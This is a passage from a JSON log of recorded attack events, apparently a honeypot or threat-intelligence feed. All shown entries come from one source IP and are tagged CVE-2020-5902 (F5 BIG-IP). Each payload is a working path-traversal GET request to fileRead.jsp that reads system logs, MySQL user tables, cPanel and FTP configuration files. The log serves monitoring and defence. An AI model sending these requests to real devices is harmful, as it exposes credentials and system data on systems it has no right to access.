1670. "user_agent": "python-requests/2.23.0",
1671. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/boot HTTP/1.1",
1672. "post_data": "",
1673. "target_port": 443,
1674. "protocol": "tcp",
1675. "tags": [
1676. {
1677. "cve": "CVE-2020-5902",
1678. "category": "Platform",
1679. "description": "F5 BIG-IP Configuration Utility RCE"
1680. }
1681. ],
1682. "event_count": 1,
1683. "first_seen": "2020-07-09T08:05:48Z",
1684. "last_seen": "2020-07-09T08:05:48Z"
1685. },
1686. {
1687. "event_id": "d1c8e1a52f65c9674a1573caf2bb806d1c6930148d9984ab50d480ca11285787",
1688. "source_ip_address": "85.248.227.163",
1689. "country": "SK",
1690. "user_agent": "python-requests/2.23.0",
1691. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/auth.log HTTP/1.1",
1692. "post_data": "",
1693. "target_port": 443,
1694. "protocol": "tcp",
1695. "tags": [
1696. {
1697. "cve": "CVE-2020-5902",
1698. "category": "Platform",
1699. "description": "F5 BIG-IP Configuration Utility RCE"
1700. }
1701. ],
1702. "event_count": 1,
1703. "first_seen": "2020-07-09T08:05:46Z",
1704. "last_seen": "2020-07-09T08:05:46Z"
1705. },
1706. {
1707. "event_id": "986537e41cdd692f4d06b2854daef514a29e2415d59f8503db5395c6bb609039",
1708. "source_ip_address": "85.248.227.163",
1709. "country": "SK",
1710. "user_agent": "python-requests/2.23.0",
1711. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/apache-ssl/error.log HTTP/1.1",
1712. "post_data": "",
1713. "target_port": 443,
1714. "protocol": "tcp",
1715. "tags": [
1716. {
1717. "cve": "CVE-2020-5902",
1718. "category": "Platform",
1719. "description": "F5 BIG-IP Configuration Utility RCE"
1720. }
1721. ],
1722. "event_count": 1,
1723. "first_seen": "2020-07-09T08:05:45Z",
1724. "last_seen": "2020-07-09T08:05:45Z"
1725. },
1726. {
1727. "event_id": "d73ef8c414896bf2fe135561265d36e4e39c218a2c2072937da3ee018257bcbd",
1728. "source_ip_address": "85.248.227.163",
1729. "country": "SK",
1730. "user_agent": "python-requests/2.23.0",
1731. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/apache-ssl/access.log HTTP/1.1",
1732. "post_data": "",
1733. "target_port": 443,
1734. "protocol": "tcp",
1735. "tags": [
1736. {
1737. "cve": "CVE-2020-5902",
1738. "category": "Platform",
1739. "description": "F5 BIG-IP Configuration Utility RCE"
1740. }
1741. ],
1742. "event_count": 1,
1743. "first_seen": "2020-07-09T08:05:43Z",
1744. "last_seen": "2020-07-09T08:05:43Z"
1745. },
1746. {
1747. "event_id": "e3a3bb52f05703bec648cb1654633282e4c82238ec4ed2374b0db4ac05b5ac22",
1748. "source_ip_address": "85.248.227.163",
1749. "country": "SK",
1750. "user_agent": "python-requests/2.23.0",
1751. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/apache/error.log HTTP/1.1",
1752. "post_data": "",
1753. "target_port": 443,
1754. "protocol": "tcp",
1755. "tags": [
1756. {
1757. "cve": "CVE-2020-5902",
1758. "category": "Platform",
1759. "description": "F5 BIG-IP Configuration Utility RCE"
1760. }
1761. ],
1762. "event_count": 1,
1763. "first_seen": "2020-07-09T08:05:42Z",
1764. "last_seen": "2020-07-09T08:05:42Z"
1765. },
1766. {
1767. "event_id": "42212a1afe8f177da8c8639cef6c967d37b0d14afb628405939665f1130d876a",
1768. "source_ip_address": "85.248.227.163",
1769. "country": "SK",
1770. "user_agent": "python-requests/2.23.0",
1771. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/apache/error_log HTTP/1.1",
1772. "post_data": "",
1773. "target_port": 443,
1774. "protocol": "tcp",
1775. "tags": [
1776. {
1777. "cve": "CVE-2020-5902",
1778. "category": "Platform",
1779. "description": "F5 BIG-IP Configuration Utility RCE"
1780. }
1781. ],
1782. "event_count": 1,
1783. "first_seen": "2020-07-09T08:05:40Z",
1784. "last_seen": "2020-07-09T08:05:40Z"
1785. },
1786. {
1787. "event_id": "1af14abf50fcf5cf97ef9a7d60351df0dd51d76e6a3bd7d74cc476e6a83a683e",
1788. "source_ip_address": "85.248.227.163",
1789. "country": "SK",
1790. "user_agent": "python-requests/2.23.0",
1791. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/apache/access.log HTTP/1.1",
1792. "post_data": "",
1793. "target_port": 443,
1794. "protocol": "tcp",
1795. "tags": [
1796. {
1797. "cve": "CVE-2020-5902",
1798. "category": "Platform",
1799. "description": "F5 BIG-IP Configuration Utility RCE"
1800. }
1801. ],
1802. "event_count": 1,
1803. "first_seen": "2020-07-09T08:05:39Z",
1804. "last_seen": "2020-07-09T08:05:39Z"
1805. },
1806. {
1807. "event_id": "0fb35222e4aeb905d27a58985050aab37654bb5aea2bda62c943f0a1c987357a",
1808. "source_ip_address": "85.248.227.163",
1809. "country": "SK",
1810. "user_agent": "python-requests/2.23.0",
1811. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/apache/access_log HTTP/1.1",
1812. "post_data": "",
1813. "target_port": 443,
1814. "protocol": "tcp",
1815. "tags": [
1816. {
1817. "cve": "CVE-2020-5902",
1818. "category": "Platform",
1819. "description": "F5 BIG-IP Configuration Utility RCE"
1820. }
1821. ],
1822. "event_count": 1,
1823. "first_seen": "2020-07-09T08:05:37Z",
1824. "last_seen": "2020-07-09T08:05:37Z"
1825. },
1826. {
1827. "event_id": "9e88d606a36fbfef66254bc0172c00d45e299d981d364caadb4a15431fbb0579",
1828. "source_ip_address": "85.248.227.163",
1829. "country": "SK",
1830. "user_agent": "python-requests/2.23.0",
1831. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/apache2/error.log HTTP/1.1",
1832. "post_data": "",
1833. "target_port": 443,
1834. "protocol": "tcp",
1835. "tags": [
1836. {
1837. "cve": "CVE-2020-5902",
1838. "category": "Platform",
1839. "description": "F5 BIG-IP Configuration Utility RCE"
1840. }
1841. ],
1842. "event_count": 1,
1843. "first_seen": "2020-07-09T08:05:36Z",
1844. "last_seen": "2020-07-09T08:05:36Z"
1845. },
1846. {
1847. "event_id": "668f2e1c6fc06edcfae0b5897d49aa20405e4dff6abe178e6fa3097aa172a240",
1848. "source_ip_address": "85.248.227.163",
1849. "country": "SK",
1850. "user_agent": "python-requests/2.23.0",
1851. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/apache2/error_log HTTP/1.1",
1852. "post_data": "",
1853. "target_port": 443,
1854. "protocol": "tcp",
1855. "tags": [
1856. {
1857. "cve": "CVE-2020-5902",
1858. "category": "Platform",
1859. "description": "F5 BIG-IP Configuration Utility RCE"
1860. }
1861. ],
1862. "event_count": 1,
1863. "first_seen": "2020-07-09T08:05:34Z",
1864. "last_seen": "2020-07-09T08:05:34Z"
1865. },
1866. {
1867. "event_id": "004e92ab5403522fadbb6cad84d4dde7a57d1e22d97ae476ebcf6162dad942f2",
1868. "source_ip_address": "85.248.227.163",
1869. "country": "SK",
1870. "user_agent": "python-requests/2.23.0",
1871. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/apache2/access.log HTTP/1.1",
1872. "post_data": "",
1873. "target_port": 443,
1874. "protocol": "tcp",
1875. "tags": [
1876. {
1877. "cve": "CVE-2020-5902",
1878. "category": "Platform",
1879. "description": "F5 BIG-IP Configuration Utility RCE"
1880. }
1881. ],
1882. "event_count": 1,
1883. "first_seen": "2020-07-09T08:05:33Z",
1884. "last_seen": "2020-07-09T08:05:33Z"
1885. },
1886. {
1887. "event_id": "d82c681870ce2ae03d01b90b087646d4860b866297acef63c0d2393531fb2d09",
1888. "source_ip_address": "85.248.227.163",
1889. "country": "SK",
1890. "user_agent": "python-requests/2.23.0",
1891. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/apache2/access_log HTTP/1.1",
1892. "post_data": "",
1893. "target_port": 443,
1894. "protocol": "tcp",
1895. "tags": [
1896. {
1897. "cve": "CVE-2020-5902",
1898. "category": "Platform",
1899. "description": "F5 BIG-IP Configuration Utility RCE"
1900. }
1901. ],
1902. "event_count": 1,
1903. "first_seen": "2020-07-09T08:05:31Z",
1904. "last_seen": "2020-07-09T08:05:31Z"
1905. },
1906. {
1907. "event_id": "40aefe1be11731839bd027781b9cf5794275e1eaf1e8e41213a9020ad44f1208",
1908. "source_ip_address": "85.248.227.163",
1909. "country": "SK",
1910. "user_agent": "python-requests/2.23.0",
1911. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/local/www/conf/php.ini HTTP/1.1",
1912. "post_data": "",
1913. "target_port": 443,
1914. "protocol": "tcp",
1915. "tags": [
1916. {
1917. "cve": "CVE-2020-5902",
1918. "category": "Platform",
1919. "description": "F5 BIG-IP Configuration Utility RCE"
1920. }
1921. ],
1922. "event_count": 1,
1923. "first_seen": "2020-07-09T08:05:29Z",
1924. "last_seen": "2020-07-09T08:05:29Z"
1925. },
1926. {
1927. "event_id": "eddf936419aec431ae7b0f4a976757ae4475abdaee773747bda0a69e147c6c87",
1928. "source_ip_address": "85.248.227.163",
1929. "country": "SK",
1930. "user_agent": "python-requests/2.23.0",
1931. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/lib/mysql/mysql/user.MYD HTTP/1.1",
1932. "post_data": "",
1933. "target_port": 443,
1934. "protocol": "tcp",
1935. "tags": [
1936. {
1937. "cve": "CVE-2020-5902",
1938. "category": "Platform",
1939. "description": "F5 BIG-IP Configuration Utility RCE"
1940. }
1941. ],
1942. "event_count": 1,
1943. "first_seen": "2020-07-09T08:05:28Z",
1944. "last_seen": "2020-07-09T08:05:28Z"
1945. },
1946. {
1947. "event_id": "a25ca4621d4435f949230018da79eaf9efd53d188a1601148dac9c6757974676",
1948. "source_ip_address": "85.248.227.163",
1949. "country": "SK",
1950. "user_agent": "python-requests/2.23.0",
1951. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/lib/mysql/my.cnf HTTP/1.1",
1952. "post_data": "",
1953. "target_port": 443,
1954. "protocol": "tcp",
1955. "tags": [
1956. {
1957. "cve": "CVE-2020-5902",
1958. "category": "Platform",
1959. "description": "F5 BIG-IP Configuration Utility RCE"
1960. }
1961. ],
1962. "event_count": 1,
1963. "first_seen": "2020-07-09T08:05:26Z",
1964. "last_seen": "2020-07-09T08:05:26Z"
1965. },
1966. {
1967. "event_id": "a69c3f7cdaeeed9dcee90a1d57f26c1d3f798fd3685546a1fab26adce2b31448",
1968. "source_ip_address": "85.248.227.163",
1969. "country": "SK",
1970. "user_agent": "python-requests/2.23.0",
1971. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/cpanel/cpanel.config HTTP/1.1",
1972. "post_data": "",
1973. "target_port": 443,
1974. "protocol": "tcp",
1975. "tags": [
1976. {
1977. "cve": "CVE-2020-5902",
1978. "category": "Platform",
1979. "description": "F5 BIG-IP Configuration Utility RCE"
1980. }
1981. ],
1982. "event_count": 1,
1983. "first_seen": "2020-07-09T08:05:25Z",
1984. "last_seen": "2020-07-09T08:05:25Z"
1985. },
1986. {
1987. "event_id": "7c33196cb95d6585a96427fd4611cf71e3b0076cfa8d69b47aebb372cc7fa80d",
1988. "source_ip_address": "85.248.227.163",
1989. "country": "SK",
1990. "user_agent": "python-requests/2.23.0",
1991. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/apache/logs/error_log HTTP/1.1",
1992. "post_data": "",
1993. "target_port": 443,
1994. "protocol": "tcp",
1995. "tags": [
1996. {
1997. "cve": "CVE-2020-5902",
1998. "category": "Platform",
1999. "description": "F5 BIG-IP Configuration Utility RCE"
2000. }
2001. ],
2002. "event_count": 1,
2003. "first_seen": "2020-07-09T08:05:23Z",
2004. "last_seen": "2020-07-09T08:05:23Z"
2005. },
2006. {
2007. "event_id": "0d976be75a39bbca8c7fa8226bcaa7cb462a06012aee1a286ed7af849ee41e0e",
2008. "source_ip_address": "85.248.227.163",
2009. "country": "SK",
2010. "user_agent": "python-requests/2.23.0",
2011. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/apache/logs/access_log HTTP/1.1",
2012. "post_data": "",
2013. "target_port": 443,
2014. "protocol": "tcp",
2015. "tags": [
2016. {
2017. "cve": "CVE-2020-5902",
2018. "category": "Platform",
2019. "description": "F5 BIG-IP Configuration Utility RCE"
2020. }
2021. ],
2022. "event_count": 1,
2023. "first_seen": "2020-07-09T08:05:22Z",
2024. "last_seen": "2020-07-09T08:05:22Z"
2025. },
2026. {
2027. "event_id": "8a678a15aa0f95de44797f3134575e785b3696c9e31dbd3cca59576431a55db6",
2028. "source_ip_address": "85.248.227.163",
2029. "country": "SK",
2030. "user_agent": "python-requests/2.23.0",
2031. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/apache2/config.inc HTTP/1.1",
2032. "post_data": "",
2033. "target_port": 443,
2034. "protocol": "tcp",
2035. "tags": [
2036. {
2037. "cve": "CVE-2020-5902",
2038. "category": "Platform",
2039. "description": "F5 BIG-IP Configuration Utility RCE"
2040. }
2041. ],
2042. "event_count": 1,
2043. "first_seen": "2020-07-09T08:05:20Z",
2044. "last_seen": "2020-07-09T08:05:20Z"
2045. },
2046. {
2047. "event_id": "4329dfa013dbe2dcc75cf02a448d4dfbc36bdcdfa12a3de3e9a0f2c0639064d9",
2048. "source_ip_address": "85.248.227.163",
2049. "country": "SK",
2050. "user_agent": "python-requests/2.23.0",
2051. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/adm/log/xferlog HTTP/1.1",
2052. "post_data": "",
2053. "target_port": 443,
2054. "protocol": "tcp",
2055. "tags": [
2056. {
2057. "cve": "CVE-2020-5902",
2058. "category": "Platform",
2059. "description": "F5 BIG-IP Configuration Utility RCE"
2060. }
2061. ],
2062. "event_count": 1,
2063. "first_seen": "2020-07-09T08:05:19Z",
2064. "last_seen": "2020-07-09T08:05:19Z"
2065. },
2066. {
2067. "event_id": "1601ee2e9848b68ef434af9dccdaaea96dd379e46c67d9acccd5258eee5d348f",
2068. "source_ip_address": "85.248.227.163",
2069. "country": "SK",
2070. "user_agent": "python-requests/2.23.0",
2071. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/sbin/pure-config.pl HTTP/1.1",
2072. "post_data": "",
2073. "target_port": 443,
2074. "protocol": "tcp",
2075. "tags": [
2076. {
2077. "cve": "CVE-2020-5902",
2078. "category": "Platform",
2079. "description": "F5 BIG-IP Configuration Utility RCE"
2080. }
2081. ],
2082. "event_count": 1,
2083. "first_seen": "2020-07-09T08:05:17Z",
2084. "last_seen": "2020-07-09T08:05:17Z"
2085. },
2086. {
2087. "event_id": "82aa5a03696456eeac428056755e49a6269bacacc2ce57caa7cacbe61a3bfc44",
2088. "source_ip_address": "85.248.227.163",
2089. "country": "SK",
2090. "user_agent": "python-requests/2.23.0",
2091. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/Zend/etc/php.ini HTTP/1.1",
2092. "post_data": "",
2093. "target_port": 443,
2094. "protocol": "tcp",
2095. "tags": [
2096. {
2097. "cve": "CVE-2020-5902",
2098. "category": "Platform",
2099. "description": "F5 BIG-IP Configuration Utility RCE"
2100. }
2101. ],
2102. "event_count": 1,
2103. "first_seen": "2020-07-09T08:05:16Z",
2104. "last_seen": "2020-07-09T08:05:16Z"
2105. },
2106. {
2107. "event_id": "045068b10faa6936fd7f90cf42e539ec81d5dd2610d6a0e536319661ec167e14",
2108. "source_ip_address": "85.248.227.163",
2109. "country": "SK",
2110. "user_agent": "python-requests/2.23.0",
2111. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/www/logs/httpd_log HTTP/1.1",
2112. "post_data": "",
2113. "target_port": 443,
2114. "protocol": "tcp",
2115. "tags": [
2116. {
2117. "cve": "CVE-2020-5902",
2118. "category": "Platform",
2119. "description": "F5 BIG-IP Configuration Utility RCE"
2120. }
2121. ],
2122. "event_count": 1,
2123. "first_seen": "2020-07-09T08:05:14Z",
2124. "last_seen": "2020-07-09T08:05:14Z"
2125. },
2126. {
2127. "event_id": "929ffb1bc03c8565992e78d0e2315360efb06c7cb1ec1e4e2ebdb21ff3b8fb56",
2128. "source_ip_address": "85.248.227.163",
2129. "country": "SK",
2130. "user_agent": "python-requests/2.23.0",
2131. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/pureftpd/sbin/pure-config.pl HTTP/1.1",
2132. "post_data": "",
2133. "target_port": 443,
2134. "protocol": "tcp",
2135. "tags": [
2136. {
2137. "cve": "CVE-2020-5902",
2138. "category": "Platform",
2139. "description": "F5 BIG-IP Configuration Utility RCE"
2140. }
2141. ],
2142. "event_count": 1,
2143. "first_seen": "2020-07-09T08:05:13Z",
2144. "last_seen": "2020-07-09T08:05:13Z"
2145. },
2146. {
2147. "event_id": "3682dbc260f81162de1f1f5fbe87880d109c25d5b3b19782cd0fc760325e0e36",
2148. "source_ip_address": "85.248.227.163",
2149. "country": "SK",
2150. "user_agent": "python-requests/2.23.0",
2151. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/pureftpd/etc/pureftpd.pdn HTTP/1.1",
2152. "post_data": "",
2153. "target_port": 443,
2154. "protocol": "tcp",
2155. "tags": [
2156. {
2157. "cve": "CVE-2020-5902",
2158. "category": "Platform",
2159. "description": "F5 BIG-IP Configuration Utility RCE"
2160. }
2161. ],
2162. "event_count": 1,
2163. "first_seen": "2020-07-09T08:05:11Z",
2164. "last_seen": "2020-07-09T08:05:11Z"
2165. },
2166. {
2167. "event_id": "0f81f0be2cfc56f39b5643487d5a8697026de6a35641e718b6062ad6ec4a1a94",
2168. "source_ip_address": "85.248.227.163",
2169. "country": "SK",
2170. "user_agent": "python-requests/2.23.0",
2171. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/pureftpd/etc/pure-ftpd.conf HTTP/1.1",
2172. "post_data": "",
2173. "target_port": 443,
2174. "protocol": "tcp",
2175. "tags": [
2176. {
2177. "cve": "CVE-2020-5902",
2178. "category": "Platform",
2179. "description": "F5 BIG-IP Configuration Utility RCE"
2180. }
2181. ],
2182. "event_count": 1,
2183. "first_seen": "2020-07-09T08:05:10Z",
2184. "last_seen": "2020-07-09T08:05:10Z"
2185. },
2186. {
2187. "event_id": "cfd52876d1ad71fdd5ee3b3f9584676d38ea1f71e3f77a19f9b6e0ca13cbe7a5",
2188. "source_ip_address": "85.248.227.163",
2189. "country": "SK",
2190. "user_agent": "python-requests/2.23.0",
2191. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/php/lib/php.ini HTTP/1.1",
2192. "post_data": "",
2193. "target_port": 443,
2194. "protocol": "tcp",
2195. "tags": [
2196. {
2197. "cve": "CVE-2020-5902",
2198. "category": "Platform",
2199. "description": "F5 BIG-IP Configuration Utility RCE"
2200. }
2201. ],
2202. "event_count": 1,
2203. "first_seen": "2020-07-09T08:05:08Z",
2204. "last_seen": "2020-07-09T08:05:08Z"
2205. },
2206. {
2207. "event_id": "0202cef9aa9ad2151a0f3ce6febaf8607f5977116e0937b80c340925d781f05d",
2208. "source_ip_address": "85.248.227.163",
2209. "country": "SK",
2210. "user_agent": "python-requests/2.23.0",
2211. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/php/httpd.conf.ini HTTP/1.1",
2212. "post_data": "",
2213. "target_port": 443,
2214. "protocol": "tcp",
2215. "tags": [
2216. {
2217. "cve": "CVE-2020-5902",
2218. "category": "Platform",
2219. "description": "F5 BIG-IP Configuration Utility RCE"
2220. }
2221. ],
2222. "event_count": 1,
2223. "first_seen": "2020-07-09T08:05:07Z",
2224. "last_seen": "2020-07-09T08:05:07Z"
2225. },
2226. {
2227. "event_id": "0acaf1a67980b8ccbfc84dae8f7babd8e7882ce896e0aca7e7282b1484327cc8",
2228. "source_ip_address": "85.248.227.163",
2229. "country": "SK",
2230. "user_agent": "python-requests/2.23.0",
2231. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/php/httpd.conf HTTP/1.1",
2232. "post_data": "",
2233. "target_port": 443,
2234. "protocol": "tcp",
2235. "tags": [
2236. {
2237. "cve": "CVE-2020-5902",
2238. "category": "Platform",
2239. "description": "F5 BIG-IP Configuration Utility RCE"
2240. }
2241. ],
2242. "event_count": 1,
2243. "first_seen": "2020-07-09T08:05:06Z",
2244. "last_seen": "2020-07-09T08:05:06Z"
2245. },
2246. {
2247. "event_id": "6b39bbe430b6c981d82087f396e0c99b152ac7af166a72f524e49136fb52815e",
2248. "source_ip_address": "85.248.227.163",
2249. "country": "SK",
2250. "user_agent": "python-requests/2.23.0",
2251. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/php5/lib/php.ini HTTP/1.1",
2252. "post_data": "",
2253. "target_port": 443,
2254. "protocol": "tcp",
2255. "tags": [
2256. {
2257. "cve": "CVE-2020-5902",
2258. "category": "Platform",
2259. "description": "F5 BIG-IP Configuration Utility RCE"
2260. }
2261. ],
2262. "event_count": 1,
2263. "first_seen": "2020-07-09T08:05:04Z",
2264. "last_seen": "2020-07-09T08:05:04Z"
2265. },
2266. {
2267. "event_id": "b1b838409c66c6831acdfd1320f288f30ed0abf60c44aa6d9e1d14efee22270c",
2268. "source_ip_address": "85.248.227.163",
2269. "country": "SK",
2270. "user_agent": "python-requests/2.23.0",
2271. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/php5/httpd.conf.php HTTP/1.1",
2272. "post_data": "",
2273. "target_port": 443,
2274. "protocol": "tcp",
2275. "tags": [
2276. {
2277. "cve": "CVE-2020-5902",
2278. "category": "Platform",
2279. "description": "F5 BIG-IP Configuration Utility RCE"
2280. }
2281. ],
2282. "event_count": 1,
2283. "first_seen": "2020-07-09T08:05:03Z",
2284. "last_seen": "2020-07-09T08:05:03Z"
2285. },
2286. {
2287. "event_id": "b356ea14563293150f0be0dc4c8e3a2d8b1e56db1580d284164b0c6cb34037db",
2288. "source_ip_address": "85.248.227.163",
2289. "country": "SK",
2290. "user_agent": "python-requests/2.23.0",
2291. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/php5/httpd.conf HTTP/1.1",
2292. "post_data": "",
2293. "target_port": 443,
2294. "protocol": "tcp",
2295. "tags": [
2296. {
2297. "cve": "CVE-2020-5902",
2298. "category": "Platform",
2299. "description": "F5 BIG-IP Configuration Utility RCE"
2300. }
2301. ],
2302. "event_count": 1,
2303. "first_seen": "2020-07-09T08:05:01Z",
2304. "last_seen": "2020-07-09T08:05:01Z"
2305. },
2306. {
2307. "event_id": "d88ecb89c269381fb79aecee2807513417f7cbb7d6edc529264e4982a3f42e3a",
2308. "source_ip_address": "85.248.227.163",
2309. "country": "SK",
2310. "user_agent": "python-requests/2.23.0",
2311. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/php4/lib/php.ini HTTP/1.1",
2312. "post_data": "",
2313. "target_port": 443,
2314. "protocol": "tcp",
2315. "tags": [
2316. {
2317. "cve": "CVE-2020-5902",
2318. "category": "Platform",
2319. "description": "F5 BIG-IP Configuration Utility RCE"
2320. }
2321. ],
2322. "event_count": 1,
2323. "first_seen": "2020-07-09T08:05:00Z",
2324. "last_seen": "2020-07-09T08:05:00Z"
2325. },
2326. {
2327. "event_id": "6f8ea89bedf23ebbf1d29661932e56c45d3e8afa4c4f715ddbd7de3aab3fce68",
2328. "source_ip_address": "85.248.227.163",
2329. "country": "SK",
2330. "user_agent": "python-requests/2.23.0",
2331. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/php4/httpd.conf.php HTTP/1.1",
2332. "post_data": "",
2333. "target_port": 443,
2334. "protocol": "tcp",
2335. "tags": [
2336. {
2337. "cve": "CVE-2020-5902",
2338. "category": "Platform",
2339. "description": "F5 BIG-IP Configuration Utility RCE"
2340. }
2341. ],
2342. "event_count": 1,
2343. "first_seen": "2020-07-09T08:04:58Z",
2344. "last_seen": "2020-07-09T08:04:58Z"
2345. },
2346. {
2347. "event_id": "745c63a47f24e7e589551bc3125dbe515ad3508c94ba30021845599b970ad8ad",
2348. "source_ip_address": "85.248.227.163",
2349. "country": "SK",
2350. "user_agent": "python-requests/2.23.0",
2351. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/php4/httpd.conf HTTP/1.1",
2352. "post_data": "",
2353. "target_port": 443,
2354. "protocol": "tcp",
2355. "tags": [
2356. {
2357. "cve": "CVE-2020-5902",
2358. "category": "Platform",
2359. "description": "F5 BIG-IP Configuration Utility RCE"
2360. }
2361. ],
2362. "event_count": 1,
2363. "first_seen": "2020-07-09T08:04:57Z",
2364. "last_seen": "2020-07-09T08:04:57Z"
2365. },
2366. {
2367. "event_id": "725f13f4adb136a862a30e5a5c47fc258990089d42b654f4d7c46090fa6afda8",
2368. "source_ip_address": "85.248.227.163",
2369. "country": "SK",
2370. "user_agent": "python-requests/2.23.0",
2371. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/lib/php.ini HTTP/1.1",
2372. "post_data": "",
2373. "target_port": 443,
2374. "protocol": "tcp",
2375. "tags": [
2376. {
2377. "cve": "CVE-2020-5902",
2378. "category": "Platform",
2379. "description": "F5 BIG-IP Configuration Utility RCE"
2380. }
2381. ],
2382. "event_count": 1,
2383. "first_seen": "2020-07-09T08:04:55Z",
2384. "last_seen": "2020-07-09T08:04:55Z"
2385. },
2386. {
2387. "event_id": "d1112ad9d0f7f042bbf501baaec9fb2d6707af6297a8feabdad95814e7ddd575",
2388. "source_ip_address": "85.248.227.163",
2389. "country": "SK",
2390. "user_agent": "python-requests/2.23.0",
2391. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/etc/pureftpd.pdb HTTP/1.1",
2392. "post_data": "",
2393. "target_port": 443,
2394. "protocol": "tcp",
2395. "tags": [
2396. {
2397. "cve": "CVE-2020-5902",
2398. "category": "Platform",
2399. "description": "F5 BIG-IP Configuration Utility RCE"
2400. }
2401. ],
2402. "event_count": 1,
2403. "first_seen": "2020-07-09T08:04:54Z",
2404. "last_seen": "2020-07-09T08:04:54Z"
2405. },
2406. {
2407. "event_id": "a30da7638e362534770ccc837bc3813a51a178c14d1275f5ec5c4d4ced632d4d",
2408. "source_ip_address": "85.248.227.163",
2409. "country": "SK",
2410. "user_agent": "python-requests/2.23.0",
2411. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/etc/pure-ftpd.conf HTTP/1.1",
2412. "post_data": "",
2413. "target_port": 443,
2414. "protocol": "tcp",
2415. "tags": [
2416. {
2417. "cve": "CVE-2020-5902",
2418. "category": "Platform",
2419. "description": "F5 BIG-IP Configuration Utility RCE"
2420. }
2421. ],
2422. "event_count": 1,
2423. "first_seen": "2020-07-09T08:04:52Z",
2424. "last_seen": "2020-07-09T08:04:52Z"
2425. },
2426. {
2427. "event_id": "fc0baad81e84c419280ef8d0295171afe4725fa67558e7ee387c263ddb04768e",
2428. "source_ip_address": "85.248.227.163",
2429. "country": "SK",
2430. "user_agent": "python-requests/2.23.0",
2431. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/etc/php.ini HTTP/1.1",
2432. "post_data": "",
2433. "target_port": 443,
2434. "protocol": "tcp",
2435. "tags": [
2436. {
2437. "cve": "CVE-2020-5902",
2438. "category": "Platform",
2439. "description": "F5 BIG-IP Configuration Utility RCE"
2440. }
2441. ],
2442. "event_count": 1,
2443. "first_seen": "2020-07-09T08:04:50Z",
2444. "last_seen": "2020-07-09T08:04:50Z"
2445. },
2446. {
2447. "event_id": "c295018e571a5eee75d84d5f802522c5e6254adc6d55412f1524375510dfdbf5",
2448. "source_ip_address": "85.248.227.163",
2449. "country": "SK",
2450. "user_agent": "python-requests/2.23.0",
2451. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/usr/local/etc/httpd/logs/error_log HTTP/1.1",
2452. "post_data": "",
2453. "target_port": 443,
2454. "protocol": "tcp",
2455. "tags": [
2456. {
2457. "cve": "CVE-2020-5902",
2458. "category": "Platform",
2459. "description": "F5 BIG-IP Configuration Utility RCE"
2460. }
2461. ],
2462. "event_count": 1,
2463. "first_seen": "2020-07-09T08:04:49Z",
2464. "last_seen": "2020-07-09T08:04:49Z"
2465. },
2466. {
2467. "event_id": "c49869d19ec0cedd4603d1cb9bba10aaa1cd0f960bd2ff3153d88de14c0563c5",
